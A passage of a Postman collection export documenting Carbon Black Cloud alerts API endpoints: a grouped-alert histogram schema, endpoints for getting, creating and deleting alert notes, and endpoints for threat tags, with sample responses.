\"HOST_BASED_FIREWALL\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"MONITORED\",\n      \"MONITORED\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"NOT_APPLIED\",\n      \"APPLIED\"\n    ],\n    \"run_state\": [\n      \"DID_NOT_RUN\",\n      \"UNKNOWN\"\n    ],\n    \"sensor_action\": [\n      \"ALLOW\",\n      \"DENY\"\n    ],\n    \"workflow_status\": [\n      \"OPEN\",\n      \"OPEN\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"MDR\",\n      \"ML\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"FALSE_POSITIVE\",\n      \"TRUE_POSITIVE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"SUPPRESSION\",\n      \"SYSTEM\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\",\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\",\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"HIGH\",\n      \"HIGH\"\n    ],\n    \"device_os\": [\n      \"MAC\",\n      \"MAC\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"ONSITE\",\n      \"UNKNOWN\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"COMPROMISED_OBSOLETE\",\n      \"NOT_LISTED\"\n    ],\n    \"process_reputation\": [\n      \"NOT_COMPANY_WHITE_OBSOLETE\",\n      \"ADMIN_RESTRICT_OBSOLETE\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"TRUSTED_WHITE_LIST\",\n      \"ADWARE\"\n    ],\n    \"parent_reputation\": [\n      \"COMMON_WHITE_LIST\",\n      \"COMMON_WHITE_LIST\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"ADWARE\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"NON_MALWARE\",\n      \"UNKNOWN\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"INTERNAL_INBOUND\",\n      \"INTERNAL_OUTBOUND\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"remote_is_private\": \"&lt;boolean&gt;\",\n    \"remote_namespace\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"IGNORE\",\n      \"ADAPTIVE_WHITE_LIST\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"NOT_ANOMALOUS\",\n      \"NOT_CLASSIFIED\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"HIGH\",\n      \"HIGH\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"HIGH\",\n      \"MEDIUM\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"ACTION_REQUESTED\",\n      \"PENDING_RESPONSE\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"NONE\",\n      \"NOT_REVIEWED\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"field\": \"LAST_EVENT_TIMESTAMP\",\n  \"min_count\": 0\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","grouped_alerts","_histogram"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4c003610-6890-4a5a-be7b-a96de83f4b74","name":"Get alert histogram for grouped alerts","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"bucket_size\": \"+5DAY\",\n    \"field\": \"LAST_EVENT_TIMESTAMP\",\n    \"min_count\": 0\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_histogram"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 18 Apr 2023 02:45:53 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"100"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=F8E15220DD8AB43241512CB679093E49; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"start\": \"2023-04-03T00:00:00.000Z\",\n    \"end\": \"2023-04-18T00:00:00.000Z\",\n    \"results\": [\n        {\n            \"step_start\": \"2023-04-03T00:00:00.000Z\",\n            \"total\": 6\n        },\n        {\n            \"step_start\": \"2023-04-08T00:00:00.000Z\",\n            \"total\": 10\n        },\n        {\n            \"step_start\": \"2023-04-13T00:00:00.000Z\",\n            \"total\": 16\n        },\n        {\n            \"step_start\": \"2023-04-18T00:00:00.000Z\",\n            \"total\": 1\n        }\n    ]\n}"}],"_postman_id":"2ff08101-134e-45fe-83ab-e8e2594da628"}],"id":"0d1436a6-3e4d-4522-a150-7fd8f8c95261","_postman_id":"0d1436a6-3e4d-4522-a150-7fd8f8c95261","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Notes on Alerts","item":[{"name":"Get Notes","id":"b34d8862-8a05-4d27-8a19-e47130bd7d22","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes?sort_field=create_timestamp&sort_order=desc","description":"<p>Get all notes associated with an Alert.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See complete documentation on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">Developer Network -Alerts API</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Specify the field that will be used to sort notes.</p>\n","type":"text/plain"},"key":"sort_field","value":"create_timestamp"},{"description":{"content":"<p>Specify the sort order, ASC or DESC</p>\n","type":"text/plain"},"key":"sort_order","value":"desc"}],"variable":[]}},"response":[{"id":"56472bee-7b34-4fde-a683-43cffff55220","name":"Get Notes For An Alert","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes","host":["{{cb_url}}"],"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes"],"query":[{"key":"sort_field","value":"<string>","description":"Specify the field that will be used to sort notes.","disabled":true},{"key":"sort_order","value":"<string>","description":"Specify the sort order, ASC or DESC","disabled":true}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 23:51:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"226"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=F3F938842C5A9173C7C21329E806D660; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"author\": \"demouser@demoorg.com\",\n            \"create_timestamp\": \"2023-04-16T23:35:10.295Z\",\n            \"last_update_timestamp\": \"2023-04-16T23:35:10.295Z\",\n            \"id\": \"eb0c0791-505b-408e-8b03-24562a95a875\",\n            \"source\": \"CUSTOMER\",\n            \"note\": \"A note for API demo\"\n        }\n    ],\n    \"num_found\": 1,\n    \"num_available\": 1\n}"}],"_postman_id":"b34d8862-8a05-4d27-8a19-e47130bd7d22"},{"name":"Create a Note","id":"cca5c8d2-6660-481d-a506-ef9bd700eff9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"note\": \"The note that will be added to the alert\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes","description":"<p>Create a new note on an Alert.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"note\": \"&lt;string&gt;\"\n  \"parent_id\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p>See complete documentation on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">Developer Network -Alerts API</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"563f4090-9965-4283-b161-0fd7b533d37b","name":"Create an alert-level note","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"note\": \"The note that will be added to the alert\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 17 Apr 2023 00:12:18 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Content-Length","value":"289"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=ED7711B848D5E1F32B2A15E3930C2011; Path=/api/alerts; Secure; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"author\": \"APIKEYID12345\",\n    \"create_timestamp\": \"2023-04-17T00:12:18.441Z\",\n    \"last_update_timestamp\": \"2023-04-17T00:12:18.441Z\",\n    \"id\": \"eff9866e-70bd-4e78-b820-3b3b6e84e2c3\",\n    \"source\": \"CUSTOMER\",\n    \"note\": \"The note that will be added to the alert\"\n}"}],"_postman_id":"cca5c8d2-6660-481d-a506-ef9bd700eff9"},{"name":"Delete a Note","id":"fb50d931-b9b7-4d0b-bab1-c4366095fef2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes/{{cb_alert_note_id}}","description":"<p>Delete the specified note.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes","{{cb_alert_note_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"58739ff0-7add-4748-92ef-3e259182c458","name":"Note deleted successfully","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"{{cb_url}}/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes/{{cb_note_id}}","host":["{{cb_url}}"],"path":["v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes","{{cb_note_id}}"],"variable":[{"key":"org_key"},{"key":"alert_id"},{"key":"id"}]}},"status":"No Content","code":204,"_postman_previewlanguage":"text","header":null,"cookie":[],"responseTime":null,"body":null},{"id":"eb3382a3-04c9-46b0-802e-efb1779d8077","name":"Note not found","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"{{cb_url}}/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/notes/{{cb_note_id}}","host":["{{cb_url}}"],"path":["v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","notes","{{cb_note_id}}"],"variable":[{"key":"org_key"},{"key":"alert_id"},{"key":"id"}]}},"status":"Not Found","code":404,"_postman_previewlanguage":"text","header":null,"cookie":[],"responseTime":null,"body":null}],"_postman_id":"fb50d931-b9b7-4d0b-bab1-c4366095fef2"}],"id":"87ef682e-df08-4ef9-bd26-695687dd995b","_postman_id":"87ef682e-df08-4ef9-bd26-695687dd995b","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"tags","item":[{"name":"Get a list of tags based on Threat Id","id":"5eeba513-603c-465c-8f65-4f107a2d83bf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags","description":"<p>Get all the tags associated with the specified threat.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.tags</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div>","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","tags"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"651ff2b5-8252-4313-a573-5064e7ac774c","name":"Get a list of tags based on Threat Id","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 25 Apr 2023 15:22:15 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"20"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=228F94610BE0E367AAAC687E0DC07B39; Path=/api/alerts; Secure; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"list\": [\n        \"DemoTag01\"\n    ]\n}"}],"_postman_id":"5eeba513-603c-465c-8f65-4f107a2d83bf"},{"name":"Update Tags","id":"6be9e864-b58d-4dbf-8f76-d6a790b5973d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"tags\": [\n    \"DemoTag01\",\n    \"DemoTag02\"\n  ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags","description":"<p>Add tags to a threat.</p>\n<p>The response includes all tags associated with the Threat.</p>\n<h3 